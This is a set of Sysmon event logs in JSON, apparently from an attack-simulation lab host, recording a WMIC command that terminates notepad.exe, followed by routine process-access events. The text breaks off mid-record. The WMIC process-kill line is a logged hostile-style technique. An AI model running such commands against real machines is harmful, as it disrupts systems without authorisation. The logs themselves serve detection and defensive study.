{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5856,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.537\r\nProcessGuid: {41C8662E-20D9-5F25-0000-00102C370900}\r\nProcessId: 4808\r\nImage: C:\\Windows\\System32\\wbem\\WMIC.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: WMI Commandline Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: wmic.exe\r\nCommandLine: wmic  /node:\"127.0.0.1\" process where name='notepad.exe' delete  \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20D7-5F25-0000-0020ADE10800}\r\nLogonId: 0x8E1AD\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E\r\nParentProcessGuid: {41C8662E-20D9-5F25-0000-001066360900}\r\nParentProcessId: 1428\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"wmic /node:\"127.0.0.1\" process where name='notepad.exe' delete >nul 2>&1\" ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.537","ProcessGuid":"{41C8662E-20D9-5F25-0000-00102C370900}","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"WMI Commandline Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"wmic.exe","CommandLine":"wmic  /node:\"127.0.0.1\" process where name='notepad.exe' delete  ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20D7-5F25-0000-0020ADE10800}","LogonId":"0x8e1ad","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E","ParentProcessGuid":"{41C8662E-20D9-5F25-0000-001066360900}","ParentProcessId":"1428","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic /node:\"127.0.0.1\" process where name='notepad.exe' delete &gt;nul 2&gt;&amp;1\" ","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5857,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.534\r\nSourceProcessGUID: {41C8662E-20D9-5F25-0000-001066360900}\r\nSourceProcessId: 1428\r\nSourceThreadId: 3900\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-00102C370900}\r\nTargetProcessId: 4808\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.534","SourceProcessGUID":"{41C8662E-20D9-5F25-0000-001066360900}","SourceProcessId":"1428","SourceThreadId":"3900","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-00102C370900}","TargetProcessId":"4808","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5858,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.534\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-00102C370900}\r\nTargetProcessId: 4808\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.534","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-00102C370900}","TargetProcessId":"4808","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5859,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.534\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.534","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5860,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.534\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.534","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5861,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.534\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.534","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5862,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.534\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.534","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5863,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.534\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.534","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5864,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.534\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 